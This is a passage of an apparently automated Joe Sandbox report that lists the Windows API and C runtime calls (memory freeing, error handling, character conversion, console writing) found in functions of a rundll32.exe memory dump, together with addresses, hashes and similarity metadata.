                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: __crt_fast_encode_pointer$_free
                    • String ID:
                    • API String ID: 366466260-0
                    • Opcode ID: d8c5f098d6cb52b236ca23f3d871a3460e5d67e08ab579634feb3412fa54b214
                    • Instruction ID: 73dcf99f964ae74769b98e803fbb23b146fbe8836e721e506cd9c0c5081e6d66
                    • Opcode Fuzzy Hash: d8c5f098d6cb52b236ca23f3d871a3460e5d67e08ab579634feb3412fa54b214
                    • Instruction Fuzzy Hash: A9418436A00204DFEB10DF68C985A6DB7F6FF85B24F154468E556EB341DB31AD01CB81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _free.LIBCMT ref: 70010B70
                      • Part of subcall function 700074E6: HeapFree.KERNEL32(00000000,00000000,?,70010DFA,?,00000000,?,?,?,7001109D,?,00000007,?,?,700102FF,?), ref: 700074FC
                      • Part of subcall function 700074E6: GetLastError.KERNEL32(?,?,70010DFA,?,00000000,?,?,?,7001109D,?,00000007,?,?,700102FF,?,?), ref: 7000750E
                    • _free.LIBCMT ref: 70010B82
                    • _free.LIBCMT ref: 70010B94
                    • _free.LIBCMT ref: 70010BA6
                    • _free.LIBCMT ref: 70010BB8
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    Uniqueness
                    • Uniqueness Score: -1.00%
                    APIs
                    • __Getcvt.LIBCPMT ref: 700006E7
                    • MultiByteToWideChar.KERNEL32(6FFF97EB,00000009,?,00000002,?,00000000), ref: 70000735
                    • MultiByteToWideChar.KERNEL32(6FFF97EB,00000009,00000001,BA0B7DC0,?,00000000), ref: 700007A7
                    • MultiByteToWideChar.KERNEL32(6FFF97EB,00000009,00000001,00000001,?,00000000), ref: 700007CF
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$Getcvt
                    • String ID:
                    • API String ID: 3195005509-0
                    Uniqueness
                    • Uniqueness Score: -1.00%
                    APIs
                      • Part of subcall function 7000F1E8: _free.LIBCMT ref: 7000F1F6
                      • Part of subcall function 7000E90B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,7000A5B5,?,00000000,00000000), ref: 7000E9AD
                    • GetLastError.KERNEL32 ref: 7000EC4B
                    • __dosmaperr.LIBCMT ref: 7000EC52
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 7000EC91
                    • __dosmaperr.LIBCMT ref: 7000EC98
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                    • String ID:
                    • API String ID: 167067550-0
                    Uniqueness
                    • Uniqueness Score: -1.00%
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Uniqueness
                    • Uniqueness Score: -1.00%
                    APIs
                    • GetLastError.KERNEL32(00000000,?,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 700096CB
                    • _free.LIBCMT ref: 70009728
                    • _free.LIBCMT ref: 7000975E
                    • SetLastError.KERNEL32(00000000,700471A0,000000FF,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 70009769
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast_free
                    • String ID:
                    • API String ID: 2283115069-0
                    Uniqueness
                    • Uniqueness Score: -1.00%
                    APIs
                    • GetLastError.KERNEL32(?,00000000,?,7000685A,00000000,?,700068D2,00000000,00000000,00000000,00000000,00000000,?,6FFF87EC,6FFFC83A,6FFFC83A), ref: 70009822
                    • _free.LIBCMT ref: 7000987F
                    • _free.LIBCMT ref: 700098B5
                    • SetLastError.KERNEL32(00000000,700471A0,000000FF,?,00000000,?,7000685A,00000000,?,700068D2,00000000,00000000,00000000,00000000,00000000), ref: 700098C0
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast_free
                    • String ID:
                    • API String ID: 2283115069-0
                    Uniqueness
                    • Uniqueness Score: -1.00%
                    APIs
                    • Concurrency::cancel_current_task.LIBCPMT ref: 6FFF6AA8
                    • Concurrency::cancel_current_task.LIBCPMT ref: 6FFF6AD9
                    • new.LIBCMT ref: 6FFF6AE2
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: Concurrency::cancel_current_task
                    • String ID:
                    • API String ID: 118556049-0
                    Uniqueness
                    • Uniqueness Score: -1.00%
                    APIs
                    • ___BuildCatchObject.LIBVCRUNTIME ref: 700051B5
                      • Part of subcall function 700057ED: ___BuildCatchObjectHelper.LIBVCRUNTIME ref: 7000581C
                      • Part of subcall function 700057ED: ___AdjustPointer.LIBCMT ref: 70005837
                    • _UnwindNestedFrames.LIBCMT ref: 700051CC
                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 700051DE
                    • CallCatchBlock.LIBVCRUNTIME ref: 70005202
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                    • String ID:
                    • API String ID: 2901542994-0
                    Uniqueness
                    • Uniqueness Score: -1.00%
                    APIs
                    • WriteConsoleW.KERNEL32(?,?,7000FFCF,00000000,?,?,70014C41,?,00000001,?,00000001,?,70013C9A,00000000,00000000,00000001), ref: 7001526D
                    • GetLastError.KERNEL32(?,70014C41,?,00000001,?,00000001,?,70013C9A,00000000,00000000,00000001,00000000,00000001,?,700141EE,7000FF5E), ref: 70015279
                      • Part of subcall function 7001523F: CloseHandle.KERNEL32(700479D0,70015289,?,70014C41,?,00000001,?,00000001,?,70013C9A,00000000,00000000,00000001,00000000,00000001), ref: 7001524F
                    • ___initconout.LIBCMT ref: 70015289
                      • Part of subcall function 70015201: CreateFileW.KERNEL32(70043090,40000000,00000003,00000000,00000003,00000000,00000000,70015230,70014C2E,00000001,?,70013C9A,00000000,00000000,00000001,00000000), ref: 70015214
                    • WriteConsoleW.KERNEL32(?,?,7000FFCF,00000000,?,70014C41,?,00000001,?,00000001,?,70013C9A,00000000,00000000,00000001,00000000), ref: 7001529E
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                    • String ID:
                    • API String ID: 2744216297-0
                    Uniqueness
                    • Uniqueness Score: -1.00%
                    APIs
                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 70005EA6
                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 70005EAB
                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 70005EB0
                      • Part of subcall function 7000629E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 700062AF
                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 70005EC5
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                    • String ID:
                    • API String ID: 1761009282-0
                    Uniqueness
                    • Uniqueness Score: -1.00%
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: C:\Windows\SysWOW64\rundll32.exe
                    • API String ID: 0-2837366778
                    Uniqueness
                    • Uniqueness Score: -1.00%